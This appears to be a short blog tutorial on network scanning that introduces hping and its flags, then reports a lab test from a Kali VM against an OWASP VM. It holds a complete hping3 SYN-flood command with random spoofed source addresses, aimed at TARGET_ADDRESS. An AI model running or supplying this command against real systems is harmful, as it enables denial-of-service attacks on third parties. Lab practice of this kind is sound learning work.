In general, there are two types of network scan.
- Passive Scan (Whireshark, ARP Tables)
- Active Scan (Hping, NMAP, Scapy...etc)
The difference between two is passive scan will not be recognized by targets. On the other hand, active scan will leave traces and requires more preparations before scanning the target system.
Today, we are going to cover some userfule active scan tools.
Hping is a command-line oriented TCP/IP packet assembler/analyzer.
List of features, including
- TCP/IP packet analyzer
- Support TCP, UDP, ICMP
- Firewall testing
- Port scanning
- Remote OS fingerprinting
- DoS attacks
--flood: sent packets as fast as possible. Don't show replies. --rand-dest: random destionation address mode. see the man. -V -- Verbose -c --count: packet count -d --data: data size -S --syn: set SYN flag -w --win: winsize (default 64) -p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec -s --baseport: base source port (default random) hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source TARGET_ADDRESS
To test this case, I used Kali (attacker) and OWASP (victim) on VM virtual box.
From Wireshark, we can see tons of TCP packets sent from Kali to OWASP server with random source IP address.